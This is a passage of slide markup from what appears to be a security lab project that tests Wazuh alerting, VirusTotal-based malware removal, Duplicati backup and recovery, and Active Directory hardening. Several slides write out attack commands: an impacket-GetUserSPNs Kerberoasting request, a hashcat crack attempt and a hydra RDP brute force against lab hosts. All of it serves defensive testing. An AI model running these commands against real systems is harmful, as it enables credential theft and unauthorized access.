            <a:endParaRPr sz="2000"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="411" name="Google Shape;411;p6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Files have been restored by Duplicati after being deleted.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Files have been restored by Duplicati after being deleted.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7" name="Google Shape;417;p6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6: Duplicati Local Backup</a:t>
            </a:r>
            <a:endParaRPr sz="2000"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="418" name="Google Shape;418;p6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6: Duplicati Local Backup</a:t>
            </a:r>
            <a:endParaRPr sz="2000"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="424" name="Google Shape;424;p7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70" title="Duplicati Local Backu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4" y="1353950"/>
            <a:ext cx="6465950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34775" y="227650"/>
            <a:ext cx="86721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2: Automatic removal of malicious files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Download a malicious file from a Virus Database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File is automatically deleted after detected by VirusTotal by custom remove-threat.exe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in Wazuh VirusTotal showing removal of malicious file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email alert sent to Administrator notifying removal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malicious file is automatically removed by custom remove-threat.exe, and alerts were generated by Wazuh,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The malicious file is automatically removed by custom remove-threat.exe, and alerts were generated by Wazuh, and an email alert was sent.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</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1"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https://1drv.ms/u/s!AubF3kOr_pwxgP4y2umPQ4ErU6HeEw?e=lFBObz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7: Duplicati Google Drive Backup</a:t>
            </a:r>
            <a:endParaRPr sz="2000"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="431" name="Google Shape;431;p7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backup.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Backup to Google Drive with authentication key.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Manually run or schedule-based.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Delete local files.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Restore from local backup.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Verify that files have been restored.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Files have been restored by Duplicati after being deleted.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Files have been restored by Duplicati after being deleted.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432" name="Google Shape;432;p7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7: Duplicati Google Drive Backup</a:t>
            </a:r>
            <a:endParaRPr sz="2000"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="438" name="Google Shape;438;p7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72" title="Duplicati GDrive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2" y="1353950"/>
            <a:ext cx="6465955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8: Duplicati Disaster Recovery</a:t>
            </a:r>
            <a:endParaRPr sz="2000"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="445" name="Google Shape;445;p73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Disaster Recovery: Performing a backup when there are missing or corrupted backup files.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Delete local files.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a direct restore from backup files in Google Drive.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credentials for backup.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Perform restore process.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Files have been restored by Duplicati even without using local database.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Files have been restored by Duplicati even without using local database.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446" name="Google Shape;446;p7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8: Duplicati Disaster Recovery</a:t>
            </a:r>
            <a:endParaRPr sz="2000"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="452" name="Google Shape;452;p7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74" title="Duplicati Disaster Recovery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2" y="1353950"/>
            <a:ext cx="6465952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9: Active Directory Kerberoasting</a:t>
            </a:r>
            <a:endParaRPr sz="2000"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="459" name="Google Shape;459;p7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Kerberoasting Objective: Post-exploitation attack where service account password is cracked with normal user credentials.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Ensure that Service Account has SPN set (Service Principal Name).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From Kali, run Impacket.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exploit `GetUserSPNs`.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impacket-GetUserSPNs -dc-ip 192.168.159.137 cspj.com/Victim -request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Where `Victim` is a normal user account.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hash as output.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Ensure that Hashcat cannot crack the hash.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hashcat -m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13100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-a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="105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hash.txt /usr/share/wordlists/rockyou.txt --force --show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Expected Outcome</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1400"/>
              <a:t>: Hashed password of service account cannot be cracked.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Actual Outcome</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1400"/>
              <a:t>: Hashed password of service account cannot be cracked.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Result</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1400"/>
              <a:t>: Pass</a:t>
            </a:r>
            <a:endParaRPr sz="1400"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="460" name="Google Shape;460;p7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Case 9: Active Directory Kerberoasting</a:t>
            </a:r>
            <a:endParaRPr sz="2000"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="466" name="Google Shape;466;p7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76" title="Kerberoasting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022" y="1353950"/>
            <a:ext cx="6465952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 title="Test Case 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49000" y="241875"/>
            <a:ext cx="86649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Test Case 3: Detection of brute force attempts over the network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Enable Remote Desktop on the agent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Run command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sudo hydra -L /usr/share/wordlists/rockyou.txt -P /usr/share/wordlists/rockyou.txt &lt;IP Address of agent&gt; rdp on a Kali virtual machine</a:t>
            </a:r>
            <a:endParaRPr sz="15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eriod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View alert generated by Wazuh showing multiple login failures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Expected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An alert is generated by Wazuh whenever a brute force attempt is done on the agent.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Actual Outcome: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An alert is generated by Wazuh whenever a brute force attempt is done on the agent.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Result: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="15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Pass</a:t>
            </a:r>
            <a:endParaRPr sz="15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Link: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https://1drv.ms/u/s!AubF3kOr_pwxgP4wQICWI9ltc0YtRA?e=RC0PS9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 title="Test Case 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3" y="315175"/>
            <a:ext cx="8023382" cy="451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